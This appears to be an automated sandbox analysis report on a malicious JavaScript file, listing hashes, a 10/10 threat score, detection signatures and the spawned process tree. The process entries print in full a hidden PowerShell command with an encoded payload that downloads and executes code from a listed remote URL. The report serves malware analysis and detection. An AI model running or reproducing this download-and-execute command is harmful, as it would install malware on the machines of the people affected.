Analysis

  • max time kernel
    11s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    31-08-2021 16:41

General

  • Target

    6440.js

  • Size

    541KB

  • MD5

    268848cb4ff95f5b95a8c619b626eb1e

  • SHA1

    1ba3890f085853d01475ddf9fa3d991dee706be6

  • SHA256

    f827fc739c432960cabffffa30111ac512e019928c22ce6f55efca587bdb75bf

  • SHA512

    07cfd18fa8ec70db0a1c0f061ee5c6951979bada17777dd30cc473ee0cb161882109920a8d46ca961d4626231d94b4bac85a52180c34ae90442d16d70192781c

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://jolantagraban.pl/log/57843441668980/dll/assistant.php

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\6440.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1656
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBqAG8AbABhAG4AdABhAGcAcgBhAGIAYQBuAC4AcABsAC8AbABvAGcALwA1ADcAOAA0ADMANAA0ADEANgA2ADgAOQA4ADAALwBkAGwAbAAvAGEAcwBzAGkAcwB0AGEAbgB0AC4AcABoAHAAIgApAA==
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1668
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBqAG8AbABhAG4AdABhAGcAcgBhAGIAYQBuAC4AcABsAC8AbABvAGcALwA1ADcAOAA0ADMANAA0ADEANgA2ADgAOQA4ADAALwBkAGwAbAAvAGEAcwBzAGkAcwB0AGEAbgB0AC4AcABoAHAAIgApAA==
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1532

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1532-61-0x0000000000000000-mapping.dmp

  • memory/1532-62-0x000007FEFBD91000-0x000007FEFBD93000-memory.dmp

    Filesize

    8KB

  • memory/1532-63-0x0000000002450000-0x0000000002451000-memory.dmp

    Filesize

    4KB

  • memory/1532-64-0x000000001A990000-0x000000001A991000-memory.dmp

    Filesize

    4KB

  • memory/1532-65-0x000000001A7D0000-0x000000001A7D1000-memory.dmp

    Filesize

    4KB

  • memory/1532-66-0x000000001B570000-0x000000001B571000-memory.dmp

    Filesize

    4KB

  • memory/1532-68-0x00000000026C4000-0x00000000026C6000-memory.dmp

    Filesize

    8KB

  • memory/1532-67-0x00000000026C0000-0x00000000026C2000-memory.dmp

    Filesize

    8KB

  • memory/1532-69-0x000000001C190000-0x000000001C191000-memory.dmp

    Filesize

    4KB

  • memory/1668-60-0x0000000000000000-mapping.dmp